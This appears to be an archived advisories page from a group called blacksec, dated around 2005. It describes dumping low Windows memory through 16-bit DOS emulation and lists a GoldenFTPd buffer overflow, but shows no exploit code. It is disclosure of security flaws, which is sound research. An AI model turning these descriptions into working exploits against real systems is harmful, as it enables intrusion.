"Never let school get in the way of learning."
-- Mark Twain

[BL4CK] - Advisories

Here you will find an archived list of publicly available advisories published by blacksec.

Advisories

Article 0x01 : Hello World / MS Windows memory leakage



0x02 : MS Windows memory leakage :

Synopsys :

Well, I wrote an article sometimes ago here. I discovered unprivilege users could access
parts of the RAM under Windows products...

Details :

Current Windows products (>Win 9X) have a nice
MS Dos emulation, so one can run 16b code under
Windows (with some limitations : no protected mode
for instance, from my testings). I didn't reversed the
emulations APIs, just tested if I could dump memory
ranges using asm16. Gues what ? Yeah, it works !
Using pmode would have allowed to dump up to 4Go
of mem (under a 32b box), but as mentioned before,
this doesn't seems to be supported under Win XP ;
plus since pmode uses vmem, it's probable that the
program could only dump it's own code anyway :-(
Nonetheless, here is some asm that runs in real
mode : the main limitation is that due to 16b mem
adressing (which allows 20b addresses), we can only
dump the first 1 Mo of memory :-( - which is already
bad since this area contains juicy informations
(check above url for an exemple)

GoldenFTPd <= 1.93 (Win32) Buffer Overflow/Stack Corruption



BlackSecurity Advisory - Multiple Buffer Overflows
ID:       BL4CK-2005.11.14 - 0x2
Class:    Buffer Overflow/Stack Corruption
Package:  GoldenFTPd <= 1.93 (Win32)
Released: Nov 14, 2005
Remote:   Yes
Severity: Medium